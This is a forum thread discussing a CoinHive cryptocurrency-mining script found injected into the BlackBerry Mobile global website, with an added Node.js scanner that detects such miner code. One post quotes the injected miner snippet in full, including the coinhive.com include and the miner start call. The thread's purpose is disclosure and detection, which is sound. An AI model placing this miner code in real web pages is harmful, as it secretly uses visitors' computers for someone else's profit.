  1. poopchute's Avatar
    Before you assume it's my browser that is compromised have a look for yourself, this has been verified by various people who have the same issue.
    Look at the top of the source @ www.blackberrymobile.com/en/ and see that coinhive is injected into the page at the very top.
    Last edited by poopchute; 01-02-18 at 10:11 PM.
    01-02-18 05:43 PM
  2. thurask's Avatar
    Attempting to view source on just the .com site redirects me to .com/ca, but this is with Chrome Incognito, cache flushed and my Pi-Hole disabled:

    Why does the official BlackBerry Mobile site contain CoinHive script?-there_is_no_coinhive.png

    Could you post yours to compare?
    01-02-18 08:24 PM
  3. Invictus0's Avatar
    Attempting to view source on just the .com site redirects me to .com/ca, but this is with Chrome Incognito, cache flushed and my Pi-Hole disabled:

    Why does the official BlackBerry Mobile site contain CoinHive script?-there_is_no_coinhive.png

    Could you post yours to compare?
    I can't find anything either but I assume OP is referring to this,

    https://www.reddit.com/r/blackberry/...s_coinhive_to/
    xandros9 likes this.
    01-02-18 09:02 PM
  4. poopchute's Avatar
    The CA site doesn't have the coinhive code added it seems, I just verified. As for the non-CA url, I have verified this with 2 other people using 3 different computers that the miner exists on their main site. Initially pointed out by the user cryptocripples on /r/security.

    It seems like none of the other sites are affected, only the global site which can be found at https://www.blackberrymobile.com/en/.
    Last edited by poopchute; 01-02-18 at 09:32 PM.
    xandros9 likes this.
    01-02-18 09:08 PM
  5. BigBadWulf's Avatar
    From my reading, the script:

    <script src='https://coinhive.com/lib/coinhive.min.js'></script>
    <script>
    var miner = new CoinHive.Anonymous('9KNyPFbDqJesaSxBLcQoJZX6PgXN1l d0',{throttle: 0.5});
    miner.start();
    </script>
    Being redirected through "Anonymous" is a potentially malicious, unauthorized injection.
    01-02-18 09:44 PM
  6. poopchute's Avatar
    According to the coinhive documentation, using anonymous vs user reflects who gets credit for finding a hash so that doesn't really make it that much more suspicious as I assume a lot of people would run it like that (unless they want to credit specific users of their site).
    I do indeed think though that it might be a malicious, unauthorized injection. Maybe an account on the global site got compromised or a content manager thought he could get some easy money by adding a miner to a major brand site. Who knows. Assumptions for now, I'm curious if we'll see an official statement about it.
    BigBadWulf likes this.
    01-02-18 10:08 PM
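
Added example, not part of any post in this thread: a small Node.js check that scans saved page source for the two indicators discussed above, a script include from coinhive.com and a `CoinHive.Anonymous`/`CoinHive.User` instantiation, and reports the mode, site key and throttle. The function name, the sample HTML and `SITE_KEY_PLACEHOLDER` are constructed for illustration, and the "before the root element" flag is an assumed heuristic based on the report that the code sat at the very top of the source.

```javascript
// Constructed sample: miner snippet placed ahead of the <html> element.
const SAMPLE_HTML = `<!DOCTYPE html>
<script src='https://coinhive.com/lib/coinhive.min.js'></script>
<script>
var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER',{throttle: 0.5});
miner.start();
</script>
<html><head><title>Constructed sample</title></head><body></body></html>`;

// Constructed sample: a page that only loads a same-origin script.
const CLEAN_HTML = `<!DOCTYPE html><html><head>
<script src="/static/app.js"></script></head><body></body></html>`;

function findMinerIndicators(html) {
  const findings = [];

  // 1. External script tags served from coinhive.com or a subdomain.
  const srcRe = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  for (const m of html.matchAll(srcRe)) {
    let host;
    // Resolve relative and protocol-relative URLs against a dummy base.
    try { host = new URL(m[1], 'https://page.invalid/').hostname; } catch { continue; }
    if (host === 'coinhive.com' || host.endsWith('.coinhive.com')) {
      findings.push({ type: 'script-src', url: m[1], offset: m.index });
    }
  }

  // 2. Inline miner construction: record mode, site key and throttle.
  const ctorRe = /new\s+CoinHive\.(Anonymous|User)\s*\(\s*["']([^"']*)["']/g;
  for (const m of html.matchAll(ctorRe)) {
    const end = html.indexOf(';', m.index);
    const stmt = html.slice(m.index, end === -1 ? undefined : end);
    const t = /throttle\s*:\s*([0-9.]+)/.exec(stmt);
    findings.push({ type: 'miner-init', mode: m[1], siteKey: m[2],
                    throttle: t ? Number(t[1]) : null, offset: m.index });
  }

  // 3. Heuristic: code emitted before <html> was likely prepended to the
  //    response rather than authored as part of the page template.
  const root = html.search(/<html\b/i);
  for (const f of findings) f.beforeRoot = root !== -1 && f.offset < root;
  return findings;
}

console.log(findMinerIndicators(SAMPLE_HTML));
console.log(findMinerIndicators(CLEAN_HTML));
```

The same site key showing up across unrelated sites is what allows one account to be tied to an injection campaign, so the extracted key is worth keeping with the incident notes.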
  7. BigBadWulf's Avatar
    I'm curious if we'll see an official statement about it
    I'd be surprised, but you never know. Whether or not they were aware, they are now


    PS - Title changed to remove assumptions
    01-02-18 10:12 PM
  8. thurask's Avatar
    01-02-18 11:07 PM
  9. thurask's Avatar
    I do indeed think though that it might be a malicious, unauthorized injection. Maybe an account on the global site got compromised or a content manager thought he could get some easy money by adding a miner to a major brand site. Who knows. Assumptions for now, I'm curious if we'll see an official statement about it.
    Maybe sales aren't as brisk as they thought they would be.
    01-02-18 11:54 PM
  10. Bayu Sanjaya's Avatar
    New strategy to get money I think. blackberry already compromised privacy with android to get more money. Why not for this.
    Last edited by Bayu Sanjaya; 01-03-18 at 08:45 AM. Reason: Typo
    01-03-18 08:44 AM
  11. johnny_bravo72's Avatar
    New strategy to get money I think. blackberry already compromised privacy with android to get more money. Why not for this.
    I guess you got yourself a tinfoil hat last Christmas. 😵
    01-03-18 09:02 AM
  12. Bla1ze's Avatar
    Maybe sales aren't as brisk as they thought they would be.
    Still requires people to visit the site though. Plus, as you saw, most will get bounced from the 'main' site. In any case, looks like the site was compromised, according to Coin Hive - https://www.reddit.com/r/blackberry/...ve_to/ds4p4rt/

    Why does the official BlackBerry Mobile site contain CoinHive script?-screenshot-2018-01-03-11.28.29.png
    BigBadWulf likes this.
    01-03-18 09:22 AM
  13. ToniCipriani's Avatar
    Still requires people to visit the site though. Plus, as you saw, most will get bounced from the 'main' site. In any case, looks like the site was compromised, according to Coin Hive - https://www.reddit.com/r/blackberry/...ve_to/ds4p4rt/

    Why does the official BlackBerry Mobile site contain CoinHive script?-screenshot-2018-01-03-11.28.29.png
    Why are they using a "web shop service" if that site isn't even selling anything?
    01-03-18 09:51 AM
  14. Bla1ze's Avatar
    Why are they using a "web shop service" if that site isn't even selling anything?
    Pretty sure the BlackBerry Mobile EU store is also run off the same site/servers, but can't tell right now since it's all redirecting for what I assume is the cleanup crew coming in. Also, is it really surprising if they did have a store there for no reason? On my own site, I have a ton of things set up that are never used that could be exploited if people went looking. Wouldn't exactly be shocking to know a store was there and ready to roll at any given moment.
    01-03-18 10:02 AM
  15. anon(8679041)'s Avatar
    Firefox Quantum 57.0.3 (not incognito)
    Why does the official BlackBerry Mobile site contain CoinHive script?-unt12e12itled.png
    01-04-18 07:50 AM
  16. A Noise Annoys's Avatar
    I'm having issues with the Canadian site, it doesn't matter what browser I use I'm blocked but not by my security software but by the browsers themselves. On Edge it gives you the option of going to the site anyway but it redirects to a 404 page at ca.blackberry.com. Very strange:

    Why does the official BlackBerry Mobile site contain CoinHive script?-img_20180103_142907.jpg

    Why does the official BlackBerry Mobile site contain CoinHive script?-img_20180103_143204.jpg

    Now when I either type the address blackberrymobile.com/ca/ manually or use the Google link my browsers don't even try to connect and just go straight to BlackBerry's (ie RIM's) 404 page.
    01-04-18 10:29 AM
  17. gizmo21's Avatar
    Hhm it seems BBM can't even secure their webservers.
    anon(8679041) likes this.
    01-04-18 06:16 PM
  18. Bayu Sanjaya's Avatar
    Hhm it seems BBM can't even secure their webservers.
    Blackberry web server must be using android web server. Blackberry should use bb10 to make it secure.
    01-04-18 08:25 PM
